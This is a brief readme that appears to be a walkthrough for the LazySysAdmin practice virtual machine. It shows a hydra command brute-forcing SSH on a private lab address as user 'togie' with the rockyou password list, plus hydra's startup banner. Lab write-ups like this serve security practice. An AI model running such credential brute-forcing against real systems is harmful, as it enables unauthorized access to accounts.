keerthiprabup/VM/lazySysAdmin/readme.md

 ![image](https://github.com/keerthiprabup/VM/assets/116485904/1d69af55-92ee-42b0-8d70-a04bfc3483ed)

+Using hydra we could perform a bruteforce attack on the ssh server using the username that we got from the wordpress:togie

+Results:

         # hydra -l togie -P /usr/share/wordlists/rockyou.txt ssh://192.168.42.55/ -t 4
         Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).